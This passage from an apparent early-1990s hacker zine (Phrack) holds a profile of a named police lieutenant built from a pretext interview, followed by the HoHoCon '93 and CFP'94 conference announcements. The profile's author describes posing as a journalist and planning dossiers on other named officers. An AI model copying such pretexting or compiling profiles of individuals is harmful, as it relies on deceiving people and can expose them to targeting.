  4122. about him was obtained not only from his department, but from
  4123. sources in the local and federal court systems, Ma Bell
  4124. Security, and the Federal Law Enforcement Training Center.  Lt.
  4125. Baker is *not* a potential donor to the CPSR or EFF to say the
  4126. least.
  4127.  
  4128.  I'm currently compiling similar information on other
  4129. law enforcement types in the Secret Service, Columbus Ohio PD,
  4130. Dallas PD, Georgia Bureau of Investigation and members of Ma
  4131. Bell's Data Security Group in Atlanta. Baker was just the
  4132. closest to me so I started with him.  If I can get the
  4133. information I've requested, then future submissions will
  4134. also include lesson plans furnished by FLETC on their training
  4135. courses and analysis protocols suggested by the USSS...heh...heh.
  4136.  
  4137. Yours,
  4138.  
  4139. The Grimmace
  4140.  
  4141.  
  4142.    *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
  4143.                           COMPUTER-COP PROFILE I
  4144.  
  4145.                               LT. BILL BAKER
  4146.  
  4147.                     JEFFERSON COUNTY POLICE DEPARTMENT
  4148.                            LOUISVILLE, KENTUCKY
  4149.  
  4150.  
  4151.                          INFORMATION COMPILED BY:
  4152.  
  4153.                             ** THE GRIMMACE **
  4154.  
  4155.    *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
  4156.  
  4157.  
  4158.        NAME:  Bill Baker
  4159.        RANK:  Lieutenant
  4160.  
  4161.                AGENCY:    Jefferson County Police Department
  4162.                          768 Barret Ave.
  4163.                          Louisville, Kentucky  40204
  4164.  
  4165.                    AGE:     43
  4166.  YEARS OF COMPUTER EXP:     13
  4167.  
  4168.         YEARS AS A COP:     18
  4169.     YEARS IN COMPUTER/
  4170.          TELECOM CRIME:      8
  4171.  
  4172.               TRAINING:  Federal Law Enforcement Training Ctr.
  4173.                                 Glynco, Ga.
  4174.                       - Telecommunications Crime
  4175.                           Telecom Fraud
  4176.                           Cellular Fraud
  4177.                           PBX Fraud
  4178.                       - Computer Crime
  4179.                             Illegal Access Crimes
  4180.                             Computer Crime Inves.
  4181.                             Seized System Analysis
  4182.  
  4183.                  FBI Academy
  4184.                  Quantico, Va.
  4185.                       - Computers in Narcotics Investigations
  4186.                       - Computer Crime Investigations
  4187.  
  4188.                  National Intelligence Academy
  4189.                  Ft. Lauderdale, Fl.
  4190.                       - Supervising Intelligence Operations
  4191.                             Surveillance Techniques
  4192.                             Electronic Tracking
  4193.                             Electronic Eavesdroping
  4194.                             Video Evidence Techniques
  4195.                       - Telephone Systems
  4196.                             Wiretaps
  4197.                             Dialed Number Recorders
  4198.                             Pager/Fax Intercepts
  4199.                             Technical Telephony Course
  4200.  
  4201.   PREVIOUS ASSIGNMENTS:  Patrol
  4202.                             Criminal Investigations/Burglary
  4203.                             Criminal Investigations/Homicide
  4204.                             Crime Prevention
  4205.                             Special Investigations/Vice-Intel
  4206.  
  4207.     MEMBER:  Communications Fraud Control Association
  4208.                     Washington, D.C.
  4209.  
  4210.   PUBLICATIONS:     Various computer/telecommunications
  4211.              crime oriented articles for assorted
  4212.              law enforcement and computer industry
  4213.              magazines (i.e., POLICE CHIEF, DATA TODAY)
  4214.  
  4215.  
  4216.  Posing as a freelance writer from the "Law Enforcement
  4217. Journal", I made calls to local police agencies all over this
  4218. area asking about their Computer Crime Units and received
  4219. replies ranging from "What are you talking about?" to "Maybe
  4220. FRAUD handles that...hey, Charlie...do the FRAUD guys do
  4221. anything with compoooters?".  So much for the Louisville
  4222. Division of Police...no fear there, right?
  4223.  
  4224.  But I decided to push on since Louisville, though not a
  4225. hotbed of phreakers/hackers, IS the latest home of TAP MAGAZINE
  4226. (a la Blitzkrieg BBS and the Predat0r) and has a smattering of
  4227. "hometown" folks engaged in less than legal activities through
  4228. the local phone lines.
  4229.  
  4230.  The call made to the Jefferson County Police got me a
  4231. solid response of "You'll have to talk to Lt. Bill Baker.  Hey,
  4232. Charlie, where's Lt. Baker working now?" (This guy is so low
  4233. key his own department doesn't even know where he works!) They
  4234. finally decide he's someplace called "Adam Station" and
  4235. through "various" contacts and a friendly local attorney who
  4236. rarely pays for telephone calls himself, I managed to obtain
  4237. quite a bit of information about Lt. Baker and his obviously
  4238. misguided quest.
  4239.  
  4240.  Lt. Baker is fairly typical of the "new breed" of
  4241. high-tech investigator currently being churned out by the
  4242. various federal training schools.  He's aggressive and, from
  4243. talking to other members of his department, thought of as a
  4244. "computer weenie" who was probably a hacker himself before he
  4245. embraced the "dark side" of "the FORCE". (I personally believe
  4246. that this may be more fact than fantasy after talking to him on
  4247. the phone since he seems to know more about phreaking and
  4248. hacking than one would think would be taught in the
  4249. aforementioned federal institutes of higher learning.)
  4250.  
  4251.  I finally managed to speak with Lt. Baker on the phone
  4252. and gave him my "writing about computer crime" rap which he
  4253. bought with little suspicion.  The following are excerpts from
  4254. the recording I made of the conversation [comments in brackets
  4255. are mine]:
  4256.  
  4257. TG:     How would you rate the progress of computer and
  4258.         telecommunications crime investigations in this area?
  4259.  
  4260. Baker:  There have been some good cases made here, but there's
  4261.         still a long way to go.  The main problem is that there
  4262.         hasn't been a push from local businesses in this area to combat
  4263.         these types of crimes.  Most of'em don't want to admit they've
  4264.         been hit from the outside.  If there's no complaints,
  4265.         then the departments aren't likely to want to spend the money
  4266.         to dig up additional crime, right?
  4267.  
  4268. TG:     Of the hackers you've worked on, what kind of capabilities
  4269.         do they have and how good do you think they are?
  4270.  
  4271. Baker:  Well, hackers and phreaks are like any other cross-section
  4272.         of a criminal group...there are some that are very good
  4273.         and some that are pitiful.  The best thing you can say
  4274.         about working hacker/phreaker cases is that a lot of them
  4275.         catch themselves.  They have huge egos and tend to brag
  4276.         a good deal about what they've done and how they did it.
  4277.  
  4278. TG:     Does that mean that you don't think a computer crime
  4279.         investigator has to be as good as the criminals
  4280.         he chases...I mean, because a lot of these people leave
  4281.         so many clues behind?  How would you rate your ability
  4282.         in this field?
  4283.  
  4284. Baker:  Nope...not at all.  I think that as technology gets better
  4285.         so will the crooks. Let's keep the record straight here.
  4286.         Sure, there are bozos out there who read a how-to file in
  4287.         an old PHRACK and decide that they have the knowledge
  4288.         they need to nuke the phone company or ride a VAX like
  4289.         a Hell's Angel rides a Harley.  Those are the easy ones.
  4290.         The ones who -write- [author's emphasis] the technical
  4291.         articles in PHRACK are the ones to worry about.  There
  4292.         are some stomp-down [??] incredibly knowledgeable
  4293.         individuals in circulation blasting away with their modems
  4294.         at any target of opportunity.
  4295.  
  4296. TG:     You didn't mention your own ability for investigating
  4297.         these people.
  4298.  
  4299. Baker:  (Laughs) Yeah, well...let's say I know enough to get by
  4300.         and am smart enough to know that there are no absolute
  4301.         experts.
  4302.  
  4303. TG:     How would you comment on the Steve Jackson Games case?
  4304.         Do you think the Secret Service set a lot of bad
  4305.         precedents?
  4306.  
  4307. Baker:  (Laughs) Noooooooo....sorry, pal.  That's been jawed to death
  4308.         in every phreak/hack mag, legal journal, and Internet
  4309.         newsgroup in existence and I'm not about to stick my
  4310.         neck out on that one, OK?  I will say that everyone learned
  4311.         a lot from that case and I seriously doubt if you'll see the
  4312.         same set of problems reoccurring in future cases.  Maybe
  4313.         the CSPR or EFF hired guns can come up with a new group
  4314.         of loopholes, in which case we'll have to find new ways
  4315.         to circumvent those attacks.
  4316.  
  4317. TG:     You sound a little critical of the EFF and CSPR efforts
  4318.         in their defense of so-called "computer criminals".
  4319.  
  4320. Baker:  Well, I'm sure that they believe in what they're doing.
  4321.         They must to invest that much cash and energy.  But I
  4322.         think there has to be some middle ground agreed upon
  4323.         rather than just whining about "all information should
  4324.         be free" and "if I can get into your system then I should
  4325.         be allowed to look around".  I'm not going to launch into
  4326.         a diatribe on organizations that I don't agree with. I'm
  4327.         simply going to work harder at dotting every "i" and
  4328.         crossing every "t" to make my cases more secure.  Stealing
  4329.         telephone service is a crime, defrauding businesses is a
  4330.         crime, gaining unauthorized access into someone else's
  4331.         computer system is, in most states, a crime, and even if
  4332.         there's no law on the books making it a crime, it's
  4333.         wrong.
  4334.  
  4335. TG:     Since by your own statement, you feel that high-tech
  4336.         crime investigation is still in its infancy, what groups
  4337.         or organizations would you say are in the lead in trying
  4338.         to combat this type of crime?
  4339.  
  4340. Baker:  The most significant two I know are the Federal Law
  4341.         Enforcement Training Center in Glynco, Georgia, and the
  4342.         Communications Fraud Control Association based out of
  4343.         Washington, D.C.  FLETC [he pronounces it FLET-SEE]
  4344.         probably has the finest computer crimes training program
  4345.         in the country.  They bring in acknowledged experts and
  4346.         don't cut the students any slack as far as learning to
  4347.         do things correctly and, most importantly, legally. The
  4348.         CFCA is the leader in Telecommunications security and
  4349.         provide training and assistance to telecom and computer
  4350.         companies along with law enforcement agencies all over
  4351.         the country.
  4352.  
  4353. TG:     Why do you think so few law enforcement agencies know
  4354.         anything about computer crime investigations?  Are they
  4355.         going to leave the phreaks to the feds?
  4356.  
  4357. Baker:  Nah...I don't think you can simplify it that easily.
  4358.         Most departments don't have dedicated computer crime units
  4359.         because of lack of funds to support such a unit, lack of
  4360.         trained personnel, lack of understanding of the magnitude
  4361.         of the problem, fear of increasing their crime stats or
  4362.         any combination of those reasons.  When I first got into
  4363.         this, there weren't any experts.  John Maxfield and his
  4364.         BOARDSCAN operation got a lot of talk in the hack/phreak
  4365.         journals and there were a small handful of others, but
  4366.         no real standout authorities. I talked to an awful lot
  4367.         of people before I hooked up with Clo Fleming at SPRINT
  4368.         Security who helped me a lot.
  4369.  
  4370. TG:     Do you still trade information with SPRINT?
  4371.  
  4372. Baker:  I have contacts with all the major telecom carriers.
  4373.         The training I got at FLETC really helped make some valuable
  4374.         contacts.  But I guess SPRINT and Clo Fleming would be
  4375.         my first choice simply because they were willing to help
  4376.         me when no one else would.  You can't operate in this
  4377.         environment without contacts in the OCC's.  It can't be
  4378.         done and the OCC's [Other Common Carriers] are a lot
  4379.         more willing to assist law enforcement now than they
  4380.         were in 1985.  Of course, the telecommunications industry
  4381.         is taking a $4-5 billion hit a year from fraud and that
  4382.         has a lot to do with it.
  4383.  
  4384. TG:     Do you subscribe to the hacker/phreaker magazines?
  4385.  
  4386. Baker:  Sure...I subscribe to 2600 and get copies of some
  4387.         others.  I think PHRACK's probably the best overall,
  4388.         but I can't afford the subscription rate they've imposed
  4389.         on government agencies since Craig Neidorf took the hit
  4390.         for publishing the "golden" E911 document. I've learned
  4391.         a ton of stuff over the years from PHRACK and wish it
  4392.         were still free, but they have a right to their info
  4393.         just like the people who own the systems attacked by
  4394.         hackers.  It'd be kind of hypocritical for me to rip off
  4395.         PHRACK and then turn and prosecute some other guy for
  4396.         ripping off information from another source, right?
  4397.  
  4398. TG:     What problems do you foresee in the future in computer
  4399.         and telecom crime investigations?
  4400.  
  4401. Baker:  Jeez...why don't you ask me when we'll have world peace
  4402.         or something easy? OK, I think we'll probably see the
  4403.         larger departments being forced to play catch-up with
  4404.         the current trends and always being a little behind in
  4405.         this area.  I also think you'll see more officers losing
  4406.         cases and being sued, a la SJG, until they get the
  4407.         specific training required to handle these cases the
  4408.         right way.  Turning seized systems over to the local
  4409.         "computer guy" in the department is going to cost'em in
  4410.         the long run because every lawyer who gets one of these
  4411.         cases is going to compare it bit by bit with the SJG
  4412.         case to see if there's anything there he can use for
  4413.         his client's defense.
  4414.  
  4415. TG:     There has been a lot of discussion about whether or not
  4416.         computer systems should be seized rather than just
  4417.         making copies of the data for evidence.  What is your
  4418.         policy on equipment seizures when working cases like
  4419.         this?
  4420.  
  4421. Baker:  First of all, I don't go on fishing expeditions with
  4422.         search warrants. If I have enough to convict a guy then
  4423.         I get the warrant.  I take everything that's there and
  4424.         do the analysis.  I've had cases where the defendant has
  4425.         requested copies of data he needed for various reasons
  4426.         and I've had no problems with furnishing them as long
  4427.         as the request is reasonable.  I ask for forfeiture of
  4428.         the equipment if I can link it to the crime because the
  4429.         law says I can.  If I can't link the computers, then I
  4430.         give them back...simple as that.  I think it's kind of
  4431.         interesting that most hackers or phreaks will refuse to
  4432.         take a guilty plea for a reduced charge, even if I have
  4433.         them stone cold and they're looking at a 99.999999%
  4434.         chance of conviction in a jury trial, if it means
  4435.         they'll lose their equipment in the deal.  It makes good
  4436.         leverage in certain situations.
  4437.  
  4438. TG:     Did you have any part in Operation Sun-Devil?
  4439.  
  4440. Baker:  Nope.  Though I'd have liked to.  I was on a lot of the
  4441.         systems taken down in Sun-Devil.
  4442.  
  4443. TG:     You said you were on some of the systems busted in the
  4444.         Sun-Devil operation, are you still on phreak/hack
  4445.         boards and would you name any?
  4446.  
  4447. Baker:  (Laughs a lot) I think I'll pass on naming systems I'm
  4448.         on, OK?  That'd be cheating. (Laughs again)  But I get
  4449.         around enough to know what's going on.  There are lots
  4450.         of investigators out there calling the boards.
  4451.  
  4452. TG:     I appreciate your time, Lt. Baker, and would like to ask
  4453.         one last question.  What motivates you in these cases
  4454.         since the alleged "theft" involves pretty intangible
  4455.         property?
  4456.  
  4457. Baker:  Motivation? Hmmmm...I suppose you could say it's the
  4458.         chase that motivates me more than the catch, though
  4459.         the catch is pretty good, too.  These cases tend to
  4460.         be more one-on-one than some other types and the
  4461.         adversaries can be very good at covering their tracks.
  4462.         Hell, I probably have more in common with the people
  4463.         I target than they'd like to believe.  As for the
  4464.         "intangibility" of the stolen goods, well, that's why
  4465.         we have court systems, isn't it...to define those
  4466.         little details.
  4467.  
  4468. TG:     A lot of computer crime investigators would rather stay
  4469.         in the background, but you don't seem to have taken that
  4470.         position.  Why not?
  4471.  
  4472. Baker:  Well, like anyone involved in anything relatively new,
  4473.         as opposed to the old standard type crimes like murder
  4474.         and armed robbery, it's to my benefit to have anything
  4475.         printed informing people of the problems created by
  4476.         this type of activity.  We all pay the price for telecom
  4477.         fraud, credit card fraud, data loss due to illegal
  4478.         access to computers and all the rest.  But the people
  4479.         involved in these crimes, for the most part, don't
  4480.         exhibit the same profiles as the so-called "violent"
  4481.         criminals.  In fact, I've had some very friendly
  4482.         conversations with a number of phreaks and hackers.
  4483.         Investigators who have problems would probably have
  4484.         them no matter what crimes they were investigating.
  4485.         I never assume that I'm smarter than anyone I'm
  4486.         chasing and I don't rub their noses in it when I make
  4487.         a case.  Just like I don't lose sleep when I just can't
  4488.         seem to get that last piece of the puzzle and one gets
  4489.         away.  It's hide-and-seek in cyberspace.  Pretty good
  4490.         game, actually.
  4491.  
  4492. For what it's worth, there it is.  The interview printed here
  4493. doesn't contain a lot of the bullshit that was thrown back and
  4494. forth during our conversation, just the relevant details which
  4495. tend to give an insight into this guy.
  4496.  
  4497. Frankly, I was impressed by the fact that he didn't seem
  4498. anything like I had expected after reading horror stories about
  4499. other agencies and investigators.  This guy was personable and
  4500. maybe that's an indicator that he's dangerous. Never, ever
  4501. underestimate your opponents -- even if they do sound like
  4502. "good ole boys" and talk to you like you're the best friend
  4503. they ever had.  Always remember that COPS INVENTED SOCIAL
  4504. ENGINEERING!
  4505.  
  4506. My next "computer cop" profile will deal with a rising star in
  4507. the U.S. Secret Service and his connections to the Guidry
  4508. Group, a consulting organization working for the cellular phone
  4509. industry in combating cellular fraud.
  4510.  
  4511.  
  4512.  
  4513.                               ==Phrack Magazine==
  4514.  
  4515.                  Volume Four, Issue Forty-Four, File 6 of 27
  4516.  
  4517.                                 Conference News
  4518.  
  4519.                                      Part I
  4520.  
  4521.  
  4522. ****************************************************************************
  4523.  
  4524.              [Official Announcement / Call For Participation]
  4525.                           (Distribute Freely)
  4526.  
  4527.  
  4528.  
  4529.   dFx, Phrack Magazine and cDc - Cult Of The Dead Cow proudly present :
  4530.  
  4531.  
  4532.                             The Fourth Annual
  4533.  
  4534.  
  4535.                               H O H O C O N
  4536.  
  4537.  
  4538.                        "Cliff Stoll My K0DEZ!@$#!"
  4539.  
  4540.  
  4541. Who:   All Hackers, Journalists, Security Personnel, Federal Agents,
  4542.        Lawyers, Authors, Cypherpunks, Virtual Realists, Modem Geeks,
  4543.        Telco Employees, and Other Interested Parties.
  4544.  
  4545.  
  4546. Where:        Austin North Hilton & Towers and Super 8 Motel
  4547.                         6000 Middle Fiskville Road
  4548.                            Austin, Texas  78752
  4549.                                   U.S.A.
  4550.                  Hilton : (800) 347-0330 / (512) 451-5757
  4551.                  Super 8: (800) 800-8000 / (512) 467-8163
  4552.  
  4553.  
  4554. When:      Friday December 17 through Sunday December 19, 1993
  4555.  
  4556.  
  4557.  
  4558.                              What is HoHoCon?
  4559.                              ----------------
  4560.  
  4561. HoHoCon is the largest annual gathering of those in, related to, or
  4562. wishing to know more about the computer underground. Attendees generally
  4563. include some of the most notable members of the "hacking" and "telecom"
  4564. community, journalists, authors, security professionals, lawyers, and a
  4565. host of others. Previous speakers include John Draper (Cap'n Crunch), Ray
  4566. Kaplan, Chris Goggans (Erik Bloodaxe), Bruce Sterling, and many more. The
  4567. conference is also one of the very few that is completely open to the
  4568. public and we encourage anyone who is interested to attend.
  4569.  
  4570.  
  4571.                             Hotel Information
  4572.                             -----------------
  4573.  
  4574. The Austin North Hilton recently split its complex into two separate
  4575. hotels; the Hilton and the newly added Super 8. HoHoCon guests have the
  4576. choice of staying in either hotel. Group rates are as followed :
  4577.  
  4578. Super 8: Single - $46.50, Double - $49.50, Triple - $52.50, Quad - $55.50
  4579. Hilton : Single - $69.00, Double - $79.00, Triple - $89.00, Quad - $99.00
  4580.  
  4581. Once again, the hotel has set aside a block of rooms for the conference
  4582. and we recommend making your reservations as early as possible to
  4583. guarantee a room within the block, if not to just guarantee a room period.
  4584. Rooms for the handicapped are available upon request. To make your
  4585. reservations, call the number listed above that corresponds with where
  4586. you are and where you want to stay and make sure you tell them you are
  4587. with the HoHoCon conference or else you'll end up throwing more money
  4588. away. The hotel accepts American Express, Visa, Master Card, Discover,
  4589. Diner's Club, and Carte Blanche credit cards.
  4590.  
  4591. Check-in is 3:00 p.m. and check-out is 12:00 noon. Earlier check-in is
  4592. available if there are unoccupied rooms available. Please note that in
  4593. order for the hotel to hold a room past 6:00 p.m. on the date of arrival,
  4594. the individual reservation must be secured by a deposit or guaranteed
  4595. with one of the credit cards listed above. Also, any cancellations of
  4596. guaranteed reservations must be made prior to 6:00 p.m. on the date of
  4597. arrival. You will be responsible for full payment of any guaranteed
  4598. reservations which are not cancelled by this time.
  4599.  
  4600. The hotel provides transportation to and from the airport and will give
  4601. you full information when you make your reservations.
  4602.  
  4603.  
  4604.                                 Directions
  4605.                                 ----------
  4606.  
  4607. For those of you who will be driving to the conference, the following
  4608. is a list of directions provided by the hotel (so, if they're wrong,
  4609. don't blame me):
  4610.  
  4611. Dallas : Take IH 35 south to exit 238-B, the Houston exit. At the first
  4612.          stop light, turn right on to 2222. Turn off of 2222 onto Clayton
  4613.          Lane (by the Greyhound Station). At the stop sign, turn right
  4614.          onto Middle Fiskville, the hotel is on the left.
  4615.  
  4616. San Antonio : Take IH 35 north to exit 238-B, the Houston exit. At the
  4617.               second stop light, turn left onto 2222. Turn off 2222 onto
  4618.               Clayton Lane (by the Greyhound Station). At the stop sign,
  4619.               turn right onto Middle Fiskville, the hotel is on the left.
  4620.  
  4621. Houston (on 290) : Take 290 west into Austin. Exit off of 290 at the IH35
  4622.                    exit (do not get on 35). Stay on the access road
  4623.                    heading west, you will pass two stop lights. Turn off
  4624.                    the access road onto Clayton Lane (by the Greyhound
  4625.                    Station). At the stop sign, turn right onto Middle
  4626.                    Fiskville, the hotel is on the left.
  4627.  
  4628. Houston (on 71) : Take 71 west into Austin. Exit onto 183 north. Take
  4629.                   183 north to 290 west. Take 290 west to the IH 35 exit.
  4630.                   Exit off of 290 at the IH 35 exit (do not get on 35).
  4631.                   Stay on the access road heading west, you will pass two
  4632.                   stop lights. Turn off the access road onto Clayton Lane
  4633.                   (by the Greyhound Station). At the stop sign, turn
  4634.                   right onto Middle Fiskville, the hotel in on the left.
  4635.  
  4636. Airport : Exit the airport parking lot and turn right onto Manor Road.
  4637.           Take Manor Road to Airport Boulevard and turn right. Take
  4638.           Airport Boulevard to IH 35 north. Take IH 35 to exit 238-B. At
  4639.           the second stop light, turn left onto 2222. Turn off of 2222
  4640.           onto Clayton Lane (by the Greyhound Station). At the stop sign,
  4641.           turn right onto Middle Fiskville, the hotel is on the left.
  4642.  
  4643. Call the hotel if these directions aren't complete enough or if you need
  4644. additional information.
  4645.  
  4646.  
  4647.                             Conference Details
  4648.                             __________________
  4649.  
  4650. HoHoCon will last 3 days, with the actual conference being held on
  4651. Saturday, December 18 starting at 11:00 a.m. and continuing until 5 p.m.
  4652. or earlier depending on the number of speakers. Although a few speakers
  4653. have confirmed their attendance, we are still in the planning stages and
  4654. will wait until the next update to release a speaking schedule. We welcome
  4655. any speaker or topic recommendations you might have (except for, say, "Why
  4656. I Luv Baked Potatos On A Stik!"), or, if you would like to speak yourself,
  4657. please contact us as soon as possible and let us know who you are, who you
  4658. represent (if anyone), the topic you wish to speak on, a rough estimate of
  4659. how long you will need, and whether or not you will be needing any
  4660. audio-visual aids.
  4661.  
  4662. We would like to have people bring interesting items and videos again this
  4663. year. If you have anything you think people would enjoy having the chance
  4664. to see, please let us know ahead of time, and tell us if you will need any
  4665. help getting it to the conference. If all else fails, just bring it to the
  4666. con and give it to us when you arrive. Any organization or individual that
  4667. wants to bring flyers to distribute during the conference may do so. You
  4668. may also send your flyers to us ahead of time if you can not make it to
  4669. the conference and we will distribute them for you. Left over flyers are
  4670. included with information packets and orders that we send out, so if you
  4671. want to send extras, go ahead.
  4672.  
  4673.  
  4674.                                    Cost
  4675.                                    ----
  4676.  
  4677. Unlike smaller, less informative conferences, we do not ask you to shell
  4678. out hundreds of dollars just to get in the door, nor do we take your money
  4679. and then make you sleep in a tent. We are maintaining the motto of "give
  4680. $5 if you can", but due to the incredibly high conference room rate this
  4681. year, we may step up to "$5 minimum required donation" or "give us $5 or
  4682. we'll smash your head in". Five dollars is an outrageously low price
  4683. compared to the suit infested industry conferences or even the new "Cons
  4684. are k00l and trendy, I gotta do one too!" conferences that are charging
  4685. up to $50 for admission alone.
  4686.  
  4687. To encourage people to donate, we will once again be having our wonderless
  4688. "Raffle For The Elite" during the conference. We will issue a prize list
  4689. in a future update, but we can guarantee that this year there will be a
  4690. lot more (and better) prizes than last year, including a full system (and,
  4691. no, it's not a c64 or 286). Anyone who wishes to donate worthwhile items
  4692. to the raffle, please let us know ahead of time, or if it's a last minute
  4693. acquirement, just bring it to the conference.
  4694.  
  4695.  
  4696.                            Miscellaneous Notes
  4697.                            -------------------
  4698.  
  4699. To save myself some time by mailing responses to a lot of the same
  4700. questions I expect to get, I'll answer a few of them here.
  4701.  
  4702. Although I have not talked to him myself yet, Steve Ryan has told me that
  4703. Bruce Sterling will indeed be in attendance and may say a few words.
  4704.  
  4705. As far as I know, there will not be any visitors from any other planets
  4706. at the conference. Scot Chasin is still on Earth and will be making an
  4707. appearance.
  4708.  
  4709. Video cameras will *not* be allowed inside the conference room without
  4710. prior consent due to previous agreements made with speakers who do not
  4711. wish for certain parts of their speech to be rebroadcast. Still cameras
  4712. and Etch-A-Sketch's are fine and tape recorders are too easily hidden
  4713. for us to be able to control.
  4714.  
  4715. Videos and T-Shirts from last year's conference are still available, and
  4716. will also be on hand during the conference. We do not handle the LoD World
  4717. Tour shirts, but I can tell you that the old ones are gone and a
  4718. *new* LoD shirt will be unveiled at the conference. The HoHoCon shirts are
  4719. $15 plus $3 shipping ($4.00 for two shirts). At this time, they only come
  4720. in extra large. We may add additional sizes if there is a demand for them.
  4721. The front of the shirt has the following in a white strip across the
  4722. chest:
  4723.  
  4724.                                I LOVE FEDS
  4725.  
  4726.       (Where LOVE = a red heart, very similar to the I LOVE NY logo)
  4727.  
  4728.  
  4729.                           And this on the back:
  4730.  
  4731.                             dFx & cDc Present
  4732.  
  4733.                                HOHOCON '92
  4734.  
  4735.                               December 18-20
  4736.                               Allen Park Inn
  4737.                               Houston, Texas
  4738.  
  4739.  
  4740.    There is another version of the shirt available with the following:
  4741.  
  4742.                                I LOVE WAREZ
  4743.  
  4744.  
  4745. The video includes footage from all three days, is six hours long and
  4746. costs $18 plus $3 shipping ($4.00 if purchasing another item also). Please
  4747. note that if you are purchasing multiple items, you only need to pay one
  4748. shipping charge of $4.00, not a charge for each item. If you wish to send
  4749. an order in now, make all checks or money orders payable to O.I.S.,
  4750. include your phone number and mail it to the street address listed below.
  4751. Allow a few weeks for arrival.
  4752.  
  4753. There will be new HoHoCon '93 shirts available at the conference and a
  4754. video of the festivities will be out early next year.
  4755.  
  4756.  
  4757.                               Correspondence
  4758.                               --------------
  4759.  
  4760. If anyone requires any additional information, needs to ask any questions,
  4761. wants to RSVP, wants to order anything, or would like to be added to the
  4762. mailing list to receive the HoHoCon updates, you may mail us at:
  4763.  
  4764.  
  4765.                             hohocon@cypher.com
  4766.                            drunkfux@cypher.com
  4767.                               cDc@cypher.com
  4768.                           drunkfux@crimelab.com
  4769.                            dfx@nuchat.sccsi.com
  4770.                          drunkfux@5285 (WWIV Net)
  4771.  
  4772.                            or via sluggo mail at:
  4773.  
  4774.                                  HoHoCon
  4775.                             1310 Tulane, Box 2
  4776.                               Houston, Texas
  4777.                                 77008-4106
  4778.  
  4779.  
  4780. We also have a VMB which includes all the conference information and is
  4781. probably the fastest way to get updated reports. The number is:
  4782.  
  4783.                                713-867-9544
  4784.  
  4785. You can download any of the conference announcements and related
  4786. materials by calling Metalland Southwest at 713-468-5802, which is the
  4787. offical HoHoCon BBS. The board is up 24 hours a day and all baud rates
  4788. are supported.
  4789.  
  4790. Those of you with net access can ftp to cypher.com and find all the
  4791. HoHoCon information available in /pub/hohocon. The .gifs from previous
  4792. cons are *not* currently online.
  4793.  
  4794. Conference information and updates will most likely also be found in most
  4795. computer underground related publications and mailing lists, including
  4796. CuD, CSP, Mondo 2000, 2600, Phrack, TUC, phn0rd, cypherpunks, etc. They
  4797. should also appear in a number of newsgroups including comp.dcom.telecom,
  4798. alt.security, comp.org.eff.talk, and sci.crypt. We completely encourage
  4799. people to use, reprint, and distribute any information in this file.
  4800.  
  4801.  
  4802.      Same stupid ending statement from last year to make us look good
  4803.      ----------------------------------------------------------------
  4804.  
  4805. HoHoCon '93 will be a priceless learning experience for professionals and
  4806. gives journalists a chance to gather information and ideas direct from the
  4807. source. It is also one of the very few times when all the members of the
  4808. computer underground can come together for a realistic purpose. We urge
  4809. people not to miss out on an event of this caliber, which doesn't happen
  4810. very often. If you've ever wanted to meet some of the most famous people
  4811. from the hacking community, this may be your one and only chance. Don't
  4812. wait to read about it in all the magazines and then wish you had been
  4813. there, make your plans to attend now! Be a part of what we hope to be our
  4814. largest and greatest conference ever.
  4815.  
  4816. -------------------------------------------------------------------------------
  4817.  
  4818.  
  4819.               COMPUTERS, FREEDOM, AND PRIVACY '94
  4820.                     Conference Announcement
  4821.             Scholarships, Writing Competition Notice
  4822.                  23-26 March 1994, Chicago, Il.
  4823.  
  4824.      The fourth annual conference, "Computers, Freedom, and
  4825. Privacy," (CFP'94) will be held in Chicago, Il., March 23-26, 1994.
  4826. The conference is hosted by The John Marshall Law School; George B.
  4827. Trubow, professor of law and director of the Center for Informatics
  4828. Law at John Marshall, is general chair of the conference.  The
  4829. program is sponsored jointly by these Association for Computing
  4830. Machinery (ACM) Special Interest Groups: Communications (SIGCOMM);
  4831. Computers and Society (SIGCAS); Security, Audit and Control
  4832. (SIGSAC).
  4833.  
  4834.      The advance of computer and communications technologies holds
  4835. great promise for individuals and society.  From conveniences for
  4836. consumers and efficiencies in commerce to improved public health
  4837. and safety and increased participation in government and community,
  4838. these technologies  are fundamentally transforming our environment
  4839. and our lives.
  4840.  
  4841.      At the same time, these technologies present challenges to the
  4842. idea of a free and open society.  Personal privacy and corporate
  4843. security is at risk from invasions by high-tech surveillance and
  4844. monitoring; a myriad of personal information data bases expose
  4845. private life to constant scrutiny; new forms of illegal activity
  4846. may threaten the traditional barriers between citizen and state and
  4847. present new tests of Constitutional protection; geographic
  4848. boundaries of state and nation may be recast by information
  4849. exchange that knows no boundaries in global data networks.
  4850.  
  4851.      CFP'94 will assemble experts, advocates and interest groups
  4852. from diverse perspectives and disciplines to consider freedom and
  4853. privacy in today's "information society.  Tutorials will be offered
  4854. on March 23, 1994, from 9:00 a.m. - noon and 2:00 - 500 p.m. The
  4855. conference program is Thursday, March 24, through Saturday, March
  4856. 26, 1994, and will examine the potential benefits and burdens of
  4857. new information and communications technologies and consider ways
  4858. in which society can enjoy the benefits while minimizing negative
  4859. implications.
  4860.  
  4861.                     STUDENT PAPER COMPETITION
  4862.  
  4863.      Full time college or graduate students may enter the student
  4864. paper competition.  Papers must not exceed 3000 words and should
  4865. address the impact of computer and telecommunications technologies
  4866. on freedom and privacy in society.  Winners will receive financial
  4867. support to attend the conference and present their papers.  All
  4868. papers should be submitted by December 15, 1993, (either as
  4869. straight text via e-mail or 6 printed copies) to: Prof. Eugene
  4870. Spafford, Department of Computer Science, Purdue University, West
  4871. Lafeyette, IN 47907-2004.  E-Mail: spaf@cs.purdue.edu; Voice:
  4872. 317-494-7825
  4873.  
  4874.  
  4875.                CONFERENCE REGISTRATION INFORMATION
  4876.  
  4877.      Registration fees are as follows:
  4878.      If paid by:    1/31/94   3/15/94   4/23/94
  4879.                      Early    Regular    Late
  4880.  
  4881.        Tutorial      $145      $175      $210
  4882.        Conference     315       370       420
  4883.  
  4884. NOTE: ACM members (give membership number) and John Marshall Alumni
  4885. (give graduation date) receive a $10 discount from Tutorial and $15
  4886. discount from Conference fees.
  4887.  
  4888. CONFERENCE REGISTRATION: Inquiries regarding registration should be
  4889. directed to RoseMarie Knight, Registration Chair, at the JMLS
  4890. address above; her voice number is 312-987-1420;  E-mail,
  4891. 6rknight@jmls.edu.
  4892.  
  4893. CONFERENCE INFORMATION: Communications regarding the conference
